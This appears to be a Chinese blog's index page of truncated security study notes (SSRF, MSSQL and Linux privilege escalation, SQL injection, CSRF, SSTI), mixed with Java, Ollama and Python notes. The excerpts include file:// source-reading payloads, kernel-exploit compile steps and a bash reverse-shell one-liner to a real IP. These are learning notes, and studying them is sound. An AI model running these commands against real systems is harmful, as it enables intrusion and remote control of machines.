4761 分钟

# SSRF 简单的就不说的,直接从第二部分开始: Gopher 协议,这东西现在不常见了,不过还是看看 # POST 请求 显示 file 伪协议读取源码 ?url=file:///var/html/index.php ?url=file:///var/html/flag.php 构造请求包: POST /flag.php HTTP/1.1 Host: 127.0.0.1:80 Content-Length: 36 Content—Type: appl
2.7k2 分钟

就按照 ppt 顺序看: Windows 下进行数据库提权会遇到字符集的问题,因为 cmd 和 powershell 的默认字符集都是: 但是数据库一般用的并不是这个 # MSSQL 盲注提权 背景: IIS+ASP.NET+MSSQL IIS(Internet Information Services) 是微软的 Web 服务器 ASP.NET 是其使用的后端应用程序,MSSQL 则是微软的关系型数据库 叽里咕噜一大堆说什么呢? sysadmin 拥有最高的数据库权限,所以才能用 xp_cmdshell 种默认禁止的东西 # 命令权限 系统内核级权限,比管理员高,完全控制 Window
8k7 分钟

简易版本,默认学过 C++,没写就是一样 java 程序是一系列对象的集合,是通过对象间的调用来协同的,所有的代码都必须封装到类中 大小写敏感 # 命名规范 1、 项目名全部小写 2、 包名全部小写 3、 类名首字母大写,如果类名由多个单词组成,每个单词的首字母都要大写。如:public class MyFirstClass{} 4、 变量名、方法名首字母小写,如果名称由多个单词组成,每个单词的首字母都要大写。 5、 常量名全部大写 PS:java 的标识符要求与 C++ 大致相同,不过 java 的可以是中文 # 注释规范 1、类注释 在每个类前面必须加上类注释,注释模板如下: /
2.4k2 分钟

Ollama 是一个开源的本地大语言模型框架,为本地部署 LLM 而设计 可以在 Docker 中运行,提供 CLI(命令行工具)以及 PythonSDK # 基本操作 # 模型管理 ollama pull <model-name>ollama run <model-name>//之后就可以直接交互,使用/bye或者`Ctrl+D`退出ollama status <model-name>//查看模型状态ollama listollama rm <model-name>ollama
8.4k8 分钟

最简单的就是猜一猜是不是和之前的密码是同一个 # 内核漏洞 在得到的shell上查询版本:uname -a在kali搜索该版本存在的漏洞:searchsploit linux 3.2.78下载后上传,可能需要编译:gcc -pthread 40839.c -o 40839 -lcrypt运行后可能会得到一个新的账户,切换过去:su firefart# SUID 配置 SUID(Set User ID)是 Linux/Unix 系统中的一种特殊权限,其作用是:当一个文件被设置了 SUID 权限,用户执行该文件时,会临时获得文件所有者的权限 例如 passwd 命令的所有者是 root
20k18 分钟

最最最最最基础简单的部分 (虽然它简单但是不等于我记得,更不等于我会.jpg) SQL 提权见 linux 提权 # 基本语句 先明确一件事,所有的查询语句,查的都是数据,而不是字段之类 select database() //这是查当前数据库,如果是要查所有,是; select group_concat(schema_name) from information_schema.schemate才对 注意,只有在information_schema.schemate中才存在字段schema_name,在其他两个表中都会叫做table_schema,但是在informati
12k11 分钟

重置未完 # requests # 请求 基本用法: r.text 就是整个响应。get 传的参数直接写 url 里,或者传个字典 (params=...)。 type (r.text) 为 str,且是 json 格式(反正不是就会报错,试一试总是好的.jpg),可以使用 r.json (),将其转化为字典。 其他方法: post 传参此时就只能传字典,data=... 在请求体中位于 form 部分 # 设置请求头 也是传字典,headers=... # 响应 其中 r.context 就是网页源码 # 爬取二进制数据 网页上传输的非文本都是用的二进
1.5k1 分钟

CSRF 跨站请求伪造,与 XSS 不同,XSS 是利用站内信任用户而 CSRF 是伪装信任用户(当网站使用 cookie 标明身份时,在用户没有登出该网站的情况下访问其他危险网站,危险网站使用其在该网站上的 cookie 伪装成用户发起请求)。 所以前提是:本地生成 Cookie, 不登出就访问危险网站 # GET 例子: # POST 大多 CSRF 用的都是 <img>,<iframe>,<script > 这种带 src 属性的标签,这类标签只能发出一次 GET 请求。 所以如果是使用 POST 方法进行传参的网站: 在后端的参数是_$REQUES
8.6k8 分钟

SSTI (服务器端模板注入,Server-Side Template Injection) 由于不知道哪里的 bug,查看图片需要在检查中手动把 data-src 改成 src # 介绍 漏洞成因是服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。 凡是使用模板的地方都可能会出现 SSTI 的问题,这不是模版引擎导致的问题。 以 PHP 模版引擎 Twig 为例: <?php  require_once dirna
8911 分钟

# 反弹 shell bash: bash -i >& /dev/tcp/118.31.3.26/10086 0>&1//-i 表示交互模式,>&将标准输出以及错误重定向,/dev...是使用特殊文件进行tcp连接,0>&1是将标准输入重定向。注意:0是标准输入,1是标准输出,2是标准错误。>&是组合操作符,同时操作标准输出和错误,也可以指定。base64版:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3Rjc